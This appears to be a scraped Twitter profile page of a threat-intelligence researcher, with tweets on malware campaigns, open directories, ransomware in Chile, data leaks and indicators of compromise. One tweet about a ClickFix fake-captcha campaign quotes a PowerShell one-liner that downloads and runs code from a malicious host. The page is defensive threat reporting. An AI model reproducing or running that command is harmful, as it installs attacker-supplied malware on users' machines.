Germán Fernández (@1zrr4h) 's Twitter Profile
Germán Fernández

@1zrr4h

🏴‍☠️ OFFENSIVE-INTEL 🏴‍☠️ Cyber Threat Intelligence by Hackers | Security Researcher en CronUp.com | @CuratedIntel Member | 🥷🧠🇨🇱

ID: 37090957

linkhttp://www.offensive-intel.com calendar_today02-05-2009 00:36:28

31,31K Tweet

33,33K Followers

563 Following

Anton (@antonlovesdnb) 's Twitter Profile Photo

Coming up on my 1 year anniversary with Huntress ! Taking this opportunity to go over some things myself and the team have seen in intrusions and drop some tips on basic things you can do to make your network more immune to compromise. Let's start with initial access -

Germán Fernández (@1zrr4h) 's Twitter Profile Photo

⚠️ "New" #CrazyEvil campaign 🇷🇺 Landing domain: rivatalk[.]com As usual, there is a signed malware for Windows ("Heze Hongwei Network Technology Co., Ltd.") and one also for macOS. [+] Windows sample: virustotal.com/gui/file/4a802…

⚠️ "New" #CrazyEvil campaign 🇷🇺
Landing domain: rivatalk[.]com

As usual, there is a signed malware for Windows ("Heze Hongwei Network Technology Co., Ltd.") and one also for macOS.  

[+] Windows sample: virustotal.com/gui/file/4a802…
ZachXBT (@zachxbt) 's Twitter Profile Photo

1/ My recent investigation uncovered more than $16.58M in payments since January 1, 2025 or $2.76M per month has been sent to North Korean IT workers hired as developers at various projects & companies. To put this in perspective payments range from $3K-8K per month meaning

1/ My recent investigation uncovered more than $16.58M in payments since January 1, 2025 or $2.76M per month has been sent to North Korean IT workers hired as developers at various projects & companies. 

To put this in perspective payments range from $3K-8K per month meaning
Germán Fernández (@1zrr4h) 's Twitter Profile Photo

⚠️ Entonces, el Instituto de Salud Pública de Chile 🇨🇱 está respondiendo a un ataque de #Qilin ransomware. Desde el pasado viernes 27, todos los sistemas y plataformas web del organismo se encuentran fuera de servicio, acumulando ya seis días de interrupción. Sin embargo, lo más

⚠️ Entonces, el Instituto de Salud Pública de Chile 🇨🇱 está respondiendo a un ataque de #Qilin ransomware.

Desde el pasado viernes 27, todos los sistemas y plataformas web del organismo se encuentran fuera de servicio, acumulando ya seis días de interrupción. Sin embargo, lo más
chum1ng0/bsky-security research (@chum1ng0) 's Twitter Profile Photo

🚨#Chile🇨🇱: actor malicioso vende una base de datos con 248.589 datos del Malls & Outlets VIVO, Malls & Outlets VIVO en un foro de hacking. mallsyoutletsvivo[.]cl gracias TIAL. #ciberseguridad #latinoamérica #LATAM #databreach

🚨#Chile🇨🇱: actor malicioso vende una base de datos con 248.589 datos del Malls &amp; Outlets VIVO, <a href="/mallsoutletvivo/">Malls & Outlets VIVO</a> en un foro de hacking.

mallsyoutletsvivo[.]cl

gracias <a href="/mbec03/">TIAL</a>. 

#ciberseguridad #latinoamérica #LATAM #databreach
chum1ng0/bsky-security research (@chum1ng0) 's Twitter Profile Photo

🚨#Chile🇨🇱: El actor malicioso Tanaka filtra datos del servicio automotriz llamado leon.cl en un foro de hacking. #ciberseguridad #leak #dataleak #leaked #LATAM #latinoamérica

🚨#Chile🇨🇱: El actor malicioso Tanaka filtra datos del servicio automotriz llamado leon.cl en un foro de hacking. 

#ciberseguridad #leak #dataleak #leaked #LATAM #latinoamérica
JAMESWT (@jameswt_wt) 's Twitter Profile Photo

#netsupport #rat GatewayAddress=summer25hot.]org:443 88.218.93[.]71 Main Sample from abuse.ch 👇👇👇 bazaar.abuse.ch/browse/tag/sum… Client32.ini dabe4273412d4d8ae67e8bc1786b3eac ⚠️First Sub 2025-07-07 LIC 7215675bdba98bd30c8e89aafba519de ⚠️First Sub 2025-06-19 cc Mikhail Kasimov Kelsey

#netsupport #rat 
GatewayAddress=summer25hot.]org:443
88.218.93[.]71

Main Sample from <a href="/abuse_ch/">abuse.ch</a> 
👇👇👇
bazaar.abuse.ch/browse/tag/sum…

Client32.ini
dabe4273412d4d8ae67e8bc1786b3eac
⚠️First Sub 2025-07-07
LIC
7215675bdba98bd30c8e89aafba519de
⚠️First Sub 2025-06-19

cc <a href="/500mk500/">Mikhail Kasimov</a> <a href="/k3dg3/">Kelsey</a>
Germán Fernández (@1zrr4h) 's Twitter Profile Photo

▪ http://148.135.120[.]162:8443/ #opendir with Go2bypass and something else 🤔 🔸 "svchost.exe": 28e318a9ed1580a14ef9b6a71d6a0ec5031aae9d2b748b2ed70c67cfa24a85b4 (Go2bypass) 🔸 "ws_linux_amd64": 6ce0e2df1698a965627bd7afa2cf58a86cdb3cc691a150b0ad0e19eaa49c0481 (VShell?) 🔸

▪ http://148.135.120[.]162:8443/ #opendir with Go2bypass and something else 🤔

🔸 "svchost.exe": 28e318a9ed1580a14ef9b6a71d6a0ec5031aae9d2b748b2ed70c67cfa24a85b4 (Go2bypass)
🔸 "ws_linux_amd64": 6ce0e2df1698a965627bd7afa2cf58a86cdb3cc691a150b0ad0e19eaa49c0481 (VShell?)
🔸
Germán Fernández (@1zrr4h) 's Twitter Profile Photo

🔸 http://196.251.71[.]46/ #opendir The HTML pages abuse Microsoft's search-ms URI protocol to open a remote WebDAV server at 45.151.62[.]238 and initiate the infection chain via LNK files that look like PDF's 😏 [+] "Adobe Acrobat.exe": bazaar.abuse.ch/sample/1cdce73…

🔸 http://196.251.71[.]46/ #opendir

The HTML pages abuse Microsoft's search-ms URI protocol to open a remote WebDAV server at 45.151.62[.]238 and initiate the infection chain via LNK files that look like PDF's 😏

[+] "Adobe Acrobat.exe": bazaar.abuse.ch/sample/1cdce73…
JAMESWT (@jameswt_wt) 's Twitter Profile Photo

#booking #fakecaptcha #clickfix 👇 https://admin-properties-captcha.]com/sign-in? 👇 powershell -Command "iex ((New-Object Net.WebClient).DownloadString('https://bknpnt.]com/bkngpntqow'))" Samples👇 bazaar.abuse.ch/browse/tag/bkn… ▶️AnyRun app.any.run/tasks/3deb10bd… cc Mikhail Kasimov Kelsey

#booking #fakecaptcha #clickfix
👇
https://admin-properties-captcha.]com/sign-in?
👇
powershell -Command "iex ((New-Object Net.WebClient).DownloadString('https://bknpnt.]com/bkngpntqow'))"

Samples👇
bazaar.abuse.ch/browse/tag/bkn…

▶️AnyRun
app.any.run/tasks/3deb10bd…

cc <a href="/500mk500/">Mikhail Kasimov</a> <a href="/k3dg3/">Kelsey</a>